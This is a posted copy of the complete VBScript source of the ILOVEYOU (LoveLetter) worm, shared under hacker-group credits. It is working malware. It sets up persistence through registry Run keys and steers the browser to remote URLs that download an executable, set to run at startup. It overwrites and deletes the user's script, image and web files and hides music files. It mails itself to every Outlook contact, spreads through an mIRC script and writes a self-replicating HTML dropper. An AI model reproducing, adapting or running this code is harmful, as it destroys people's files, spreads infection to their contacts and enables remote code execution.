ILOVEYOU -WORM [SOURCE CODE]

1. /*fb.com/anonnepal1337*/
2. //fb.com/r00tnepal//
3.  
4. _____________________________________________________________SOURCE CODE________________________________________________________
5. rem  barok -loveletter(vbe) <i hate go to school>
6. rem             Thanks: Xploit World Members  /  nepHaXOr  /  Nepali Hackers / Hackers Friends /  & You :) /
7. On Error Resume Next
8. dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
9. eq=""
10. ctr=0
11. Set fso = CreateObject("Scripting.FileSystemObject")
12. set file = fso.OpenTextFile(WScript.ScriptFullname,1)
13. vbscopy=file.ReadAll
14. main()
15. sub main()
16. On Error Resume Next
17. dim wscr,rr
18. set wscr=CreateObject("WScript.Shell")
19. rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
20. if (rr>=1) then
21. wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
22. end if
23. Set dirwin = fso.GetSpecialFolder(0)
24. Set dirsystem = fso.GetSpecialFolder(1)
25. Set dirtemp = fso.GetSpecialFolder(2)
26. Set c = fso.GetFile(WScript.ScriptFullName)
27. c.Copy(dirsystem&"\MSKernel32.vbs")
28. c.Copy(dirwin&"\Win32DLL.vbs")
29. c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
30. regruns()
31. html()
32. spreadtoemail()
33. listadriv()
34. end sub
35. sub regruns()
36. On Error Resume Next
37. Dim num,downread
38. regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
39. regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
40. downread=""
41. downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
42. if (downread="") then
43. downread="c:\"
44. end if
45. if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
46. Randomize
47. num = Int((4 * Rnd) + 1)
48. if num = 1 then
49. regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
50. elseif num = 2 then
51. regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
52. elseif num = 3 then
53. regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
54. elseif num = 4 then
55. regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
56. end if
57. end if
58. if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
59. regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
60. regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
61. end if
62. end sub
63. sub listadriv
64. On Error Resume Next
65. Dim d,dc,s
66. Set dc = fso.Drives
67. For Each d in dc
68. If d.DriveType = 2 or d.DriveType=3 Then
69. folderlist(d.path&"\")
70. end if
71. Next
72. listadriv = s
73. end sub
74. sub infectfiles(folderspec)  
75. On Error Resume Next
76. dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
77. set f = fso.GetFolder(folderspec)
78. set fc = f.Files
79. for each f1 in fc
80. ext=fso.GetExtensionName(f1.path)
81. ext=lcase(ext)
82. s=lcase(f1.name)
83. if (ext="vbs") or (ext="vbe") then
84. set ap=fso.OpenTextFile(f1.path,2,true)
85. ap.write vbscopy
86. ap.close
87. elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
88. set ap=fso.OpenTextFile(f1.path,2,true)
89. ap.write vbscopy
90. ap.close
91. bname=fso.GetBaseName(f1.path)
92. set cop=fso.GetFile(f1.path)
93. cop.copy(folderspec&"\"&bname&".vbs")
94. fso.DeleteFile(f1.path)
95. elseif(ext="jpg") or (ext="jpeg") then
96. set ap=fso.OpenTextFile(f1.path,2,true)
97. ap.write vbscopy
98. ap.close
99. set cop=fso.GetFile(f1.path)
100. cop.copy(f1.path&".vbs")
101. fso.DeleteFile(f1.path)
102. elseif(ext="mp3") or (ext="mp2") then
103. set mp3=fso.CreateTextFile(f1.path&".vbs")
104. mp3.write vbscopy
105. mp3.close
106. set att=fso.GetFile(f1.path)
107. att.attributes=att.attributes+2
108. end if
109. if (eq<>folderspec) then
110. if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
111. set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
112. scriptini.WriteLine "[script]"
113. scriptini.WriteLine ";mIRC Script"
114. scriptini.WriteLine ";  Please dont edit this script... mIRC will corrupt, if mIRC will"
115. scriptini.WriteLine "     corrupt... WINDOWS will affect and will not run correctly. thanks"
116. scriptini.WriteLine ";"
117. scriptini.WriteLine ";Khaled Mardam-Bey"
118. scriptini.WriteLine ";http://www.mirc.com"
119. scriptini.WriteLine ";"
120. scriptini.WriteLine "n0=on 1:JOIN:#:{"
121. scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt }"
122. scriptini.WriteLine "n2=  /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
123. scriptini.WriteLine "n3=}"
124. scriptini.close
125. eq=folderspec
126. end if
127. end if
128. next  
129. end sub
130. sub folderlist(folderspec)  
131. On Error Resume Next
132. dim f,f1,sf
133. set f = fso.GetFolder(folderspec)  
134. set sf = f.SubFolders
135. for each f1 in sf
136. infectfiles(f1.path)
137. folderlist(f1.path)
138. next  
139. end sub
140. sub regcreate(regkey,regvalue)
141. Set regedit = CreateObject("WScript.Shell")
142. regedit.RegWrite regkey,regvalue
143. end sub
144. function regget(value)
145. Set regedit = CreateObject("WScript.Shell")
146. regget=regedit.RegRead(value)
147. end function
148. function fileexist(filespec)
149. On Error Resume Next
150. dim msg
151. if (fso.FileExists(filespec)) Then
152. msg = 0
153. else
154. msg = 1
155. end if
156. fileexist = msg
157. end function
158. function folderexist(folderspec)
159. On Error Resume Next
160. dim msg
161. if (fso.GetFolderExists(folderspec)) then
162. msg = 0
163. else
164. msg = 1
165. end if
166. fileexist = msg
167. end function
168. sub spreadtoemail()
169. On Error Resume Next
170. dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
171. set regedit=CreateObject("WScript.Shell")
172. set out=WScript.CreateObject("Outlook.Application")
173. set mapi=out.GetNameSpace("MAPI")
174. for ctrlists=1 to mapi.AddressLists.Count
175. set a=mapi.AddressLists(ctrlists)
176. x=1
177. regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
178. if (regv="") then
179. regv=1
180. end if
181. if (int(a.AddressEntries.Count)>int(regv)) then
182. for ctrentries=1 to a.AddressEntries.Count
183. malead=a.AddressEntries(x)
184. regad=""
185. regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
186. if (regad="") then
187. set male=out.CreateItem(0)
188. male.Recipients.Add(malead)
189. male.Subject = "ILOVEYOU"
190. male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
191. male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
192. male.Send
193. regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
194. end if
195. x=x+1
196. next
197. regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
198. else
199. regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
200. end if
201. next
202. Set out=Nothing
203. Set mapi=Nothing
204. end sub
205. sub html
206. On Error Resume Next
207. dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
208. dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
209. "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
210. "<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _
211. "<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
212. "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
213. "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
214. "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _
215. "<?-?BODY><?-?HTML>"&vbcrlf& _
216. "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
217. "<!--?-??-?"&vbcrlf& _
218. "if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
219. "?-??-?-->"&vbcrlf& _
220. "<?-?SCRIPT>"&vbcrlf& _
221. "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
222. "<!--"&vbcrlf& _
223. "on error resume next"&vbcrlf& _
224. "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
225. "aw=1"&vbcrlf& _
226. "code="
227. dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
228. "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
229. "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
230. "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
231. "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
232. "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
233. "wri.write code4"&vbcrlf& _
234. "wri.close"&vbcrlf& _
235. "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
236. "if (err.number=424) then"&vbcrlf& _
237. "aw=0"&vbcrlf& _
238. "end if"&vbcrlf& _
239. "if (aw=1) then"&vbcrlf& _
240. "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
241. "window.close"&vbcrlf& _
242. "end if"&vbcrlf& _
243. "end if"&vbcrlf& _
244. "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
245. "regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
246. "?-??-?-->"&vbcrlf& _
247. "<?-?SCRIPT>"
248. dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
249. dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
250. dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
251. dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
252. dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
253. dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
254. dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
255. dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
256. set fso=CreateObject("Scripting.FileSystemObject")
257. set c=fso.OpenTextFile(WScript.ScriptFullName,1)
258. lines=Split(c.ReadAll,vbcrlf)
259. l1=ubound(lines)
260. for n=0 to ubound(lines)
261. lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
262. lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
263. lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
264. if (l1=n) then
265. lines(n)=chr(34)+lines(n)+chr(34)
266. else
267. lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
268. end if
269. next
270. set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
271. b.close
272. set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
273. d.write dt5
274. d.write join(lines,vbcrlf)
275. d.write vbcrlf
276. d.write dt6
277. d.close
278. end sub